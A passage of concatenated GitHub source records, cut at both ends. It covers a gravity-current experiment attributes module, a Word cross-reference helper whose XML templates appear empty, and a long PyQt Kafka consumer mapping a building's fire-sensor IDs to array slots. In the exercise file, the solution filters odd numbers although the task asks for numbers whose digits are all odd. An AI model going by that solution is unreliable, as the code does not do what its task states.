streamwise coordinates (single vector)\n ('zf', np.float32), # vertical coordinates (single vector)\n ('tf', np.float32), # time coordinates (single vector)\n\n ('Uf', np.float32), # front relative streamwise velocity\n ('Wf', np.float32), # front relative vertical velocity\n\n ('t0', np.float32), # front detection in time (scalar)\n ]\n vectors = np.dtype(vectors)\n\n\nclass ProcessorAttributes(BaseAttributes):\n \"\"\"Class attributes that define vector names / types and\n measurements used in data processing.\n\n Intended to be inherited by all classes that require access to\n these attributes.\n \"\"\"\n # The origin of the coordinate system (centre of the\n # calibration target) is 105mm from the base of the tank\n # and 3250mm from the back of the lock.\n # Coordinates are x positive downstream (away from the lock)\n # and z positive upwards (away from the base).\n horizontal_offset = 3.250\n vertical_offset = 0.105\n\n # In the calibration coordinate system, the valid region\n # is a rectangle with lower left (-0.06, -0.10) and upper\n # right (0.10, 0.02).\n # TODO: do lock relative transform first and change these to\n # lock relative coords\n valid_region_xlim = (-0.070, 0.09)\n valid_region_ylim = (-0.094, 0.02)\n\n save_vectors = ProcessedVectors.vectors\n\n\nclass 
ProcessedAttributes(BaseAttributes):\n vectors = ProcessedVectors.vectors\n save_vectors = AnalysisVectors.vectors\n\n\nclass AnalysisAttributes(BaseAttributes):\n vectors = AnalysisVectors.vectors\n\n\nclass ExperimentAttributes(object):\n def __init__(self, attributes):\n self.attributes = attributes\n\n @property\n def rlock(self):\n return self.attributes['rho_lock']\n\n @property\n def rambient(self):\n return self.attributes['rho_ambient']\n\n @property\n def L(self):\n return self.attributes['L']\n\n @property\n def H(self):\n return self.attributes['H']\n\n @property\n def D(self):\n return self.attributes['D']\n\n @property\n def g_(self):\n return 9.81 * (self.rlock - self.rambient) / self.rambient\n\n @property\n def U(self):\n return (self.g_ * self.H) ** .5\n","repo_name":"aaren/lab_turbulence","sub_path":"gc_turbulence/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":8439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37609281446","text":"\"\"\" Write a Python program to find the sublist of numbers from a given list of\nnumbers with only odd digits in increasing order. Go to the editor\nInput:\n[1, 3, 79, 10, 4, 2, 39]\nOutput:\n[1, 3, 39, 79]\nInput:\n[11, 31, 40, 68, 77, 93, 48, 1, 57]\nOutput:\n[1, 11, 31, 57, 77, 93]\nInput:\n[9, -2, 3, 4, -2, 0, 2, -3, 8, -1]\nOutput:\n[-3, -1, 3, 9]\"\"\"\n\n\ndef test(nums):\n result = list(filter(lambda x: x % 2 != 0, nums))\n return sorted(result)\n\n\nnumbers = [1, 3, 79, 10, 4, 2, 39]\nprint(test(numbers))\n\nnumbers = [9, -2, 3, 4, -2, 0, 2, -3, 8, -1]\nprint(test(numbers))","repo_name":"mirshoddev99/Problems-Patterns","sub_path":"Python-100-Exercise/solutions/80-90/82_prob.py","file_name":"82_prob.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10114433678","text":"from markupsafe import Markup\n\nfrom sarna.report_generator import make_run\n\n_xrefs_runs = \"\"\"\n\n \n \n\n\n \n REF {ref} {ops} \n\n\n \n\n\n \n [ref]\n\n\n \n\n\"\"\"\n\n_bookmark = \"\"\"\n\n{run}\n\n\"\"\"\n\n\ndef _ref_name(elem):\n return \"_Ref{:09d}\".format(elem.id)\n\n\ndef xref(elem, xref_type='number'):\n ref_name = _ref_name(elem)\n ref_ops = \"\"\n if xref_type == 'number':\n ref_ops = \"\\\\r \\\\h\"\n elif xref_type == 'title':\n ref_ops = \"\\\\h\"\n\n return Markup(_xrefs_runs.format(ref=ref_name, ops=ref_ops))\n\n\ndef bookmark(elem, attr):\n run = make_run('', getattr(elem, attr))\n return Markup(_bookmark.format(ref=_ref_name(elem), run=run))\n\n\n__all__ = ['xref', 'bookmark']\n","repo_name":"rsrdesarrollo/sarna","sub_path":"sarna/report_generator/xrefs.py","file_name":"xrefs.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"54"} +{"seq_id":"36419897948","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\nfrom plot_data import plot_data\nfrom analy_data import analy_data, FireDetection_thread\nfrom node_weight import weight_checker\nfrom GL.build_gl import build_gl\n\nimport time\nfrom datetime import datetime\nimport pymysql\nfrom collections import deque\n\nfrom shared_data import SharedData\nfrom kafka import KafkaConsumer\nfrom json import loads\n\nimport paho.mqtt.client as mqtt\nimport json\n\n\nclass kafka_thread(QThread):\n data_updated = pyqtSignal(list)\n\n pem_dir = './pem/'\n caRootLocation = pem_dir + 'CARoot.pem'\n 
certLocation = pem_dir + 'certificate.pem'\n\n consumer = KafkaConsumer(\n \"maintenance_in\",\n #\n bootstrap_servers=[\"aismarthousing.asuscomm.com:9093\"],\n auto_offset_reset=\"latest\",\n enable_auto_commit=True,\n group_id=\"hbrain5qwe013011311413q11\",\n value_deserializer=lambda x: loads(x.decode('UTF-8')),\n consumer_timeout_ms=10000,\n security_protocol=\"SSL\",\n ssl_check_hostname=True,\n #ssl_cafile=caRootLocation,\n #ssl_certfile=certLocation,\n )\n\n def __init__(self, shared_data):\n super().__init__()\n self.shared_data = shared_data\n self.values = [0] * 210\n self.max_size = 3\n self.total_deques = 210\n self.sensor_data = [[deque(maxlen=self.max_size)] for _ in range(self.total_deques)]\n\n def run(self, consumer=consumer):\n memory_map = [0] * 210\n memory_map[0] = 1\n memory_map[15] = 1\n memory_map[22] = 1\n memory_map[24] = 1\n memory_map[153] = 1\n memory_map[202] = 1\n\n memory_map_check = False\n start_time = time.time()\n\n for message in consumer:\n current_time = time.time()\n elapsed_time = current_time - start_time\n if int(elapsed_time) % 2 == 1:\n sum = 0\n if not memory_map_check:\n for i in range(210):\n sum = sum + memory_map[i]\n if sum == 210:\n memory_map_check = True\n elif memory_map_check:\n for i in range(210):\n if i == 15 or i == 22: # temp\n self.values[i] = 20.0\n elif i == 0 or i == 24 or i == 153 or i == 202: # gas , 0\n self.values[i] = 0.0\n else:\n self.values[i] = (self.sensor_data[i][0][-1][1])\n self.shared_data.set_a(self.values)\n\n start_time = current_time\n parsed_data = message.value\n\n complex_name = parsed_data.get('msg_header', {}).get('complex_name')\n device_name = parsed_data.get('msg_header', {}).get('device_name')\n if complex_name == '에너지체험하우스' and (device_name == \"연기 감지 센서\" or device_name == \"열감지기\"):\n source_key_prefix = parsed_data[\"msg_header\"][\"source_key\"][:4]\n timestamp_value = parsed_data[\"msg_data\"][0][\"field_value\"]\n heat_value = parsed_data[\"msg_data\"][1][\"field_value\"]\n status_value = parsed_data[\"msg_data\"][2][\"field_value\"]\n # region\n if source_key_prefix == \"662c\":\n memory_map[1] = 1\n self.sensor_data[1][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e139\":\n memory_map[2] = 1\n self.sensor_data[2][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"517b\":\n memory_map[3] = 1\n self.sensor_data[3][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"de2e\":\n memory_map[4] = 1\n self.sensor_data[4][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"dfca\":\n memory_map[5] = 1\n self.sensor_data[5][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7ede\":\n memory_map[6] = 1\n self.sensor_data[6][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"951c\":\n memory_map[7] = 1\n self.sensor_data[7][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e293\":\n memory_map[8] = 1\n self.sensor_data[8][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d8a5\":\n memory_map[9] = 1\n self.sensor_data[9][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8b07\":\n memory_map[10] = 1\n self.sensor_data[10][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8cb4\":\n memory_map[11] = 1\n self.sensor_data[11][0].append([timestamp_value, heat_value, 
status_value])\n # 1st floor\n elif source_key_prefix == \"a13c\":\n memory_map[12] = 1\n self.sensor_data[12][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"75c6\":\n memory_map[13] = 1\n self.sensor_data[13][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"af5c\":\n memory_map[14] = 1\n self.sensor_data[14][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7830\": # g\n memory_map[16] = 1\n self.sensor_data[16][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"51cc\": # g\n memory_map[17] = 1\n self.sensor_data[17][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0d8e\": # g\n memory_map[18] = 1\n self.sensor_data[18][0].append([timestamp_value, heat_value, status_value])\n # up to 15 (temp) so far is room 201 ,\n elif source_key_prefix == \"4e79\":\n memory_map[19] = 1\n self.sensor_data[19][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0b09\":\n memory_map[20] = 1\n self.sensor_data[20][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a223\":\n memory_map[21] = 1\n self.sensor_data[21][0].append([timestamp_value, heat_value, status_value])\n # 23, 24 are additional data.\n elif source_key_prefix == \"764b\": # g\n memory_map[23] = 1\n self.sensor_data[23][0].append([timestamp_value, heat_value, status_value])\n # 24 is the smoke sensor\n elif source_key_prefix == \"5cf2\":\n memory_map[25] = 1\n self.sensor_data[25][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bca1\":\n memory_map[26] = 1\n self.sensor_data[26][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"136c\":\n memory_map[27] = 1\n self.sensor_data[27][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a339\":\n memory_map[28] = 1\n self.sensor_data[28][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a43b\": # g\n memory_map[29] = 1\n self.sensor_data[29][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8068\": # g\n memory_map[30] = 1\n self.sensor_data[30][0].append([timestamp_value, heat_value, status_value])\n # up to here is room 203\n elif source_key_prefix == \"8ae3\":\n memory_map[31] = 1\n self.sensor_data[31][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b5c1\":\n memory_map[32] = 1\n self.sensor_data[32][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"26c7\":\n memory_map[33] = 1\n self.sensor_data[33][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"64c7\":\n memory_map[34] = 1\n self.sensor_data[34][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"83a9\":\n memory_map[35] = 1\n self.sensor_data[35][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a16b\":\n memory_map[36] = 1\n self.sensor_data[36][0].append([timestamp_value, heat_value, status_value])\n # room 204\n elif source_key_prefix == \"6a8b\":\n memory_map[37] = 1\n self.sensor_data[37][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"de4b\":\n memory_map[38] = 1\n self.sensor_data[38][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8fb0\":\n memory_map[39] = 1\n self.sensor_data[39][0].append([timestamp_value, heat_value, status_value])\n 
elif source_key_prefix == \"679f\":\n memory_map[40] = 1\n self.sensor_data[40][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7b39\": # g\n memory_map[41] = 1\n self.sensor_data[41][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6df7\": # g\n memory_map[42] = 1\n self.sensor_data[42][0].append([timestamp_value, heat_value, status_value])\n # 205호\n elif source_key_prefix == \"6cab\":\n memory_map[43] = 1\n self.sensor_data[43][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fdec\":\n memory_map[44] = 1\n self.sensor_data[44][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ff97\":\n memory_map[45] = 1\n self.sensor_data[45][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9226\":\n memory_map[46] = 1\n self.sensor_data[46][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3fc6\": # g\n memory_map[47] = 1\n self.sensor_data[47][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bf99\": # g\n memory_map[48] = 1\n self.sensor_data[48][0].append([timestamp_value, heat_value, status_value])\n # 206호\n elif source_key_prefix == \"cd80\":\n memory_map[49] = 1\n self.sensor_data[49][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"310f\":\n memory_map[50] = 1\n self.sensor_data[50][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2c2c\":\n memory_map[51] = 1\n self.sensor_data[51][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f6aa\":\n memory_map[52] = 1\n self.sensor_data[52][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2546\": # g\n memory_map[53] = 1\n self.sensor_data[53][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b9a4\": # g\n memory_map[54] = 1\n self.sensor_data[54][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4e35\": # g\n memory_map[55] = 1\n self.sensor_data[55][0].append([timestamp_value, heat_value, status_value])\n # 207호\n elif source_key_prefix == \"c7f6\":\n memory_map[56] = 1\n self.sensor_data[56][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ff69\":\n memory_map[57] = 1\n self.sensor_data[57][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1cdd\":\n memory_map[58] = 1\n self.sensor_data[58][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1a3f\":\n memory_map[59] = 1\n self.sensor_data[59][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"cb02\": # 계단\n memory_map[60] = 1\n self.sensor_data[60][0].append([timestamp_value, heat_value, status_value])\n # 2층 공용부\n elif source_key_prefix == \"33f9\":\n memory_map[61] = 1\n self.sensor_data[61][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"75d4\":\n memory_map[62] = 1\n self.sensor_data[62][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"24a3\":\n memory_map[63] = 1\n self.sensor_data[63][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3522\":\n memory_map[64] = 1\n self.sensor_data[64][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6029\":\n memory_map[65] = 1\n 
self.sensor_data[65][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"27a3\":\n memory_map[66] = 1\n self.sensor_data[66][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6bcf\":\n memory_map[67] = 1\n self.sensor_data[67][0].append([timestamp_value, heat_value, status_value])\n # 301\n elif source_key_prefix == \"d8a9\":\n memory_map[68] = 1\n self.sensor_data[68][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1d39\":\n memory_map[69] = 1\n self.sensor_data[69][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bd12\":\n memory_map[70] = 1\n self.sensor_data[70][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"550f\":\n memory_map[71] = 1\n self.sensor_data[71][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e842\":\n memory_map[72] = 1\n self.sensor_data[72][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"efc3\":\n memory_map[73] = 1\n self.sensor_data[73][0].append([timestamp_value, heat_value, status_value])\n # 302\n elif source_key_prefix == \"bd90\":\n memory_map[74] = 1\n self.sensor_data[74][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"41a0\":\n memory_map[75] = 1\n self.sensor_data[75][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a2d2\":\n memory_map[76] = 1\n self.sensor_data[76][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"cd6d\":\n memory_map[77] = 1\n self.sensor_data[77][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9351\":\n memory_map[78] = 1\n self.sensor_data[78][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"621c\":\n memory_map[79] = 1\n self.sensor_data[79][0].append([timestamp_value, heat_value, status_value])\n # 303\n elif source_key_prefix == \"c5cc\":\n memory_map[80] = 1\n self.sensor_data[80][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"cf50\":\n memory_map[81] = 1\n self.sensor_data[81][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2d09\":\n memory_map[82] = 1\n self.sensor_data[82][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fbac\":\n memory_map[83] = 1\n self.sensor_data[83][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d6be\":\n memory_map[84] = 1\n self.sensor_data[84][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7e8a\":\n memory_map[85] = 1\n self.sensor_data[85][0].append([timestamp_value, heat_value, status_value])\n # 304\n elif source_key_prefix == \"b57f\":\n memory_map[86] = 1\n self.sensor_data[86][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"84b8\":\n memory_map[87] = 1\n self.sensor_data[87][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e6df\":\n memory_map[88] = 1\n self.sensor_data[88][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5ce1\":\n memory_map[89] = 1\n self.sensor_data[89][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5aaf\":\n memory_map[90] = 1\n self.sensor_data[90][0].append([timestamp_value, heat_value, status_value])\n elif 
source_key_prefix == \"1abf\":\n memory_map[91] = 1\n self.sensor_data[91][0].append([timestamp_value, heat_value, status_value])\n # 305\n elif source_key_prefix == \"21a7\":\n memory_map[92] = 1\n self.sensor_data[92][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8132\":\n memory_map[93] = 1\n self.sensor_data[93][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a27e\":\n memory_map[94] = 1\n self.sensor_data[94][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"15e0\":\n memory_map[95] = 1\n self.sensor_data[95][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7578\":\n memory_map[96] = 1\n self.sensor_data[96][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3539\":\n memory_map[97] = 1\n self.sensor_data[97][0].append([timestamp_value, heat_value, status_value])\n # 306\n elif source_key_prefix == \"34c7\":\n memory_map[98] = 1\n self.sensor_data[98][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9c96\":\n memory_map[99] = 1\n self.sensor_data[99][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6438\":\n memory_map[100] = 1\n self.sensor_data[100][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9d94\":\n memory_map[101] = 1\n self.sensor_data[101][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"23ea\": # G\n memory_map[102] = 1\n self.sensor_data[102][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3c8f\": # G\n memory_map[103] = 1\n self.sensor_data[103][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2f14\": # g\n memory_map[104] = 1\n self.sensor_data[104][0].append([timestamp_value, heat_value, status_value])\n # 307\n elif source_key_prefix == \"2f8e\": # 3층 앞복도\n memory_map[105] = 1\n self.sensor_data[105][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"472e\": # 3층 복도\n memory_map[106] = 1\n self.sensor_data[106][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2632\": # 3층 EV홀\n memory_map[107] = 1\n self.sensor_data[107][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f0aa\": # 3층 앞복도\n memory_map[108] = 1\n self.sensor_data[108][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"da17\": # 3층 계단\n memory_map[109] = 1\n self.sensor_data[109][0].append([timestamp_value, heat_value, status_value])\n # 공용부 부분\n elif source_key_prefix == \"496f\":\n memory_map[110] = 1\n self.sensor_data[110][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"dcea\":\n memory_map[111] = 1\n self.sensor_data[111][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d220\":\n memory_map[112] = 1\n self.sensor_data[112][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9c00\":\n memory_map[113] = 1\n self.sensor_data[113][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"89d4\":\n memory_map[114] = 1\n self.sensor_data[114][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"17c2\":\n memory_map[115] = 1\n self.sensor_data[115][0].append([timestamp_value, heat_value, status_value])\n elif 
source_key_prefix == \"133f\":\n memory_map[116] = 1\n self.sensor_data[116][0].append([timestamp_value, heat_value, status_value])\n # 401\n elif source_key_prefix == \"7d73\":\n memory_map[117] = 1\n self.sensor_data[117][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0e0e\":\n memory_map[118] = 1\n self.sensor_data[118][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2905\":\n memory_map[119] = 1\n self.sensor_data[119][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1791\":\n memory_map[120] = 1\n self.sensor_data[120][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f6fd\":\n memory_map[121] = 1\n self.sensor_data[121][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"35e3\":\n memory_map[122] = 1\n self.sensor_data[122][0].append([timestamp_value, heat_value, status_value])\n # 402\n elif source_key_prefix == \"f606\":\n memory_map[123] = 1\n self.sensor_data[123][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bc24\":\n memory_map[124] = 1\n self.sensor_data[124][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7e6d\":\n memory_map[125] = 1\n self.sensor_data[125][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3d9f\":\n memory_map[126] = 1\n self.sensor_data[126][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5aa4\": # G\n memory_map[127] = 1\n self.sensor_data[127][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bf79\": # G\n memory_map[128] = 1\n self.sensor_data[128][0].append([timestamp_value, heat_value, status_value])\n # 403\n elif source_key_prefix == \"e572\":\n memory_map[129] = 1\n self.sensor_data[129][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0a80\":\n memory_map[130] = 1\n self.sensor_data[130][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6828\":\n memory_map[131] = 1\n self.sensor_data[131][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a213\":\n memory_map[132] = 1\n self.sensor_data[132][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ca65\":\n memory_map[133] = 1\n self.sensor_data[133][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d7fb\":\n memory_map[134] = 1\n self.sensor_data[134][0].append([timestamp_value, heat_value, status_value])\n # 404\n elif source_key_prefix == \"3471\":\n memory_map[135] = 1\n self.sensor_data[135][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"c1c7\":\n memory_map[136] = 1\n self.sensor_data[136][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5869\":\n memory_map[137] = 1\n self.sensor_data[137][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"77ac\":\n memory_map[138] = 1\n self.sensor_data[138][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"495a\":\n memory_map[139] = 1\n self.sensor_data[139][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"c3dd\":\n memory_map[140] = 1\n self.sensor_data[140][0].append([timestamp_value, heat_value, status_value])\n # 405\n elif source_key_prefix == 
\"5841\":\n memory_map[141] = 1\n self.sensor_data[141][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"c3b4\":\n memory_map[142] = 1\n self.sensor_data[142][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2d90\":\n memory_map[143] = 1\n self.sensor_data[143][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2edc\":\n memory_map[144] = 1\n self.sensor_data[144][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e2b2\":\n memory_map[145] = 1\n self.sensor_data[145][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fda0\":\n memory_map[146] = 1\n self.sensor_data[146][0].append([timestamp_value, heat_value, status_value])\n # 406\n elif source_key_prefix == \"67d6\":\n memory_map[147] = 1\n self.sensor_data[147][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4d9a\":\n memory_map[148] = 1\n self.sensor_data[148][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f28a\":\n memory_map[149] = 1\n self.sensor_data[149][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"51d5\":\n memory_map[150] = 1\n self.sensor_data[150][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ae25\":\n memory_map[151] = 1\n self.sensor_data[151][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d04a\":\n memory_map[152] = 1\n self.sensor_data[152][0].append([timestamp_value, heat_value, status_value])\n # 153 gas\n # 407\n elif source_key_prefix == \"06b1\": # 4층 앞복도\n memory_map[154] = 1\n self.sensor_data[154][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"826e\": # 4층 복도\n memory_map[155] = 1\n self.sensor_data[155][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f11d\": # 4층 EV홀\n memory_map[156] = 1\n self.sensor_data[156][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ba9f\": # 4층 앞복도\n memory_map[157] = 1\n self.sensor_data[157][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b76b\": # 4층 계단\n memory_map[158] = 1\n self.sensor_data[158][0].append([timestamp_value, heat_value, status_value])\n # 공용부 부분\n elif source_key_prefix == \"ca19\":\n memory_map[159] = 1\n self.sensor_data[159][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6eee\":\n memory_map[160] = 1\n self.sensor_data[160][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"af9e\":\n memory_map[161] = 1\n self.sensor_data[161][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0a55\":\n memory_map[162] = 1\n self.sensor_data[162][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b5f1\":\n memory_map[163] = 1\n self.sensor_data[163][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6121\":\n memory_map[164] = 1\n self.sensor_data[164][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3ba8\":\n memory_map[165] = 1\n self.sensor_data[165][0].append([timestamp_value, heat_value, status_value])\n # 501\n elif source_key_prefix == \"f536\":\n memory_map[166] = 1\n self.sensor_data[166][0].append([timestamp_value, heat_value, status_value])\n elif 
source_key_prefix == \"92a8\":\n memory_map[167] = 1\n self.sensor_data[167][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"efc7\":\n memory_map[168] = 1\n self.sensor_data[168][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"eb6a\":\n memory_map[169] = 1\n self.sensor_data[169][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4044\":\n memory_map[170] = 1\n self.sensor_data[170][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e23e\":\n memory_map[171] = 1\n self.sensor_data[171][0].append([timestamp_value, heat_value, status_value])\n # 502\n elif source_key_prefix == \"b383\":\n memory_map[172] = 1\n self.sensor_data[172][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f995\":\n memory_map[173] = 1\n self.sensor_data[173][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d7e8\":\n memory_map[174] = 1\n self.sensor_data[174][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8932\":\n memory_map[175] = 1\n self.sensor_data[175][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8805\":\n memory_map[176] = 1\n self.sensor_data[176][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e9c0\":\n memory_map[177] = 1\n self.sensor_data[177][0].append([timestamp_value, heat_value, status_value])\n # 503\n elif source_key_prefix == \"a450\":\n memory_map[178] = 1\n self.sensor_data[178][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9958\":\n memory_map[179] = 1\n self.sensor_data[179][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f206\":\n memory_map[180] = 1\n self.sensor_data[180][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a721\":\n memory_map[181] = 1\n self.sensor_data[181][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b0b2\":\n memory_map[182] = 1\n self.sensor_data[182][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"abba\":\n memory_map[183] = 1\n 